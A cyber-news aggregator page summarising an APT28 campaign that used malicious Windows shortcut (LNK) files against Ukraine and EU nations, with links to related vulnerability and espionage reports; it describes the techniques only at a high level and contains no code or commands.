Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

APT28 Windows Shell LNK campaign targeting Ukraine and E.U. nations

Campaign
First reported
Last updated
Happening score
H score 53
1 unique sources, 1 articles

Summary

Hide ▲

A December 2025 APT28 campaign targeted Ukraine and E.U. nations with a malicious Windows Shortcut (LNK) chain that bypassed Microsoft Defender SmartScreen and enabled attacker-controlled code execution. The operation used Windows Shell parsing and a UNC path to pull remote payloads, turning file execution into a stealthy delivery path. The same chain also triggered SMB authentication and could expose Net-NTLMv2 hashes, increasing the risk of follow-on access abuse.

Related Happenings

Windows 11 BitLocker bypass YellowKey security flaw

Vulnerability
First: 14.05.2026 10:27 Last: 14.05.2026 10:27 Sources 1

About this happening: **YellowKey** is a **Windows BitLocker security feature bypass** tracked as **CVE-2026-45585** that can expose **BitLocker-protected drives** through the **Windows Recovery Enviro...

Latest development: 20.05.2026 10:31

Microsoft assigned CVE-2026-45585 to YellowKey, a Windows BitLocker security feature bypass, and recommended removing autofstx.exe from the Session Manager BootExecute REG_MULTI_SZ value, reestablishing BitLocker trust for WinRE, and moving already encrypted devices from TPM-only to TPM+PIN to require a pre-boot PIN.

Open Happening

FamousSparrow Azerbaijanian oil-and-gas targeting campaign

Campaign
First: 13.05.2026 16:00 Last: 13.05.2026 16:00 Sources 1

About this happening: The **China-linked FamousSparrow group** ran a **targeted cyberespionage campaign** against an **Azerbaijanian oil-and-gas company** in the **South Caucasus**, highlighting a new...

Open Happening

FamousSparrow multi-wave intrusion campaign against Azerbaijani oil and gas company

Campaign
First: 13.05.2026 16:00 Last: 13.05.2026 16:00 Sources 1

About this happening: A **China-affiliated** actor tracked as **FamousSparrow (UAT-9244)** ran a **multi-wave intrusion** against an **unnamed Azerbaijani oil and gas company** from **late December 202...

Open Happening

CISA adds ScreenConnect and Windows flaws to KEV

Public Sector Action
First: 29.04.2026 11:46 Last: 29.04.2026 11:46 Sources 1

About this happening: CISA added **CVE-2024-1708** and **CVE-2026-32202** to the **KEV catalog**, elevating the flaws to a **federal remediation priority** because they are being **actively exploited**...

Open Happening

Windows Shell spoofing flaw actively exploited (CVE-2026-32202)

Vulnerability
First: 28.04.2026 08:50 Last: 28.04.2026 08:50 Sources 1

How related: Microsoft on Monday revised its advisory for a now-patched, high-severity security flaw impacting Windows Shell to acknowledge that it has been actively exploited in the wild.

About this happening: **Microsoft** updated **Windows Shell** advisory guidance to confirm **CVE-2026-32202** was **actively exploited in the wild**, raising the risk of sensitive-information disclosur...

Open Happening

Timeline

  1. 28.04.2026 08:50 2 articles · 29d ago

    Initial report: APT28 Windows Shell LNK campaign targeting Ukraine and E.U. nations

    Initial Disclosure

    In **December 2025**, **APT28** began using a **malicious LNK file** against **Ukraine** and **E.U. nations** to trigger a Windows Shell exploit chain. The initial delivery was designed to bypass **Microsoft Defender SmartScreen** and set up remote code execution through shell parsing.

    Show sources
    Open in new tab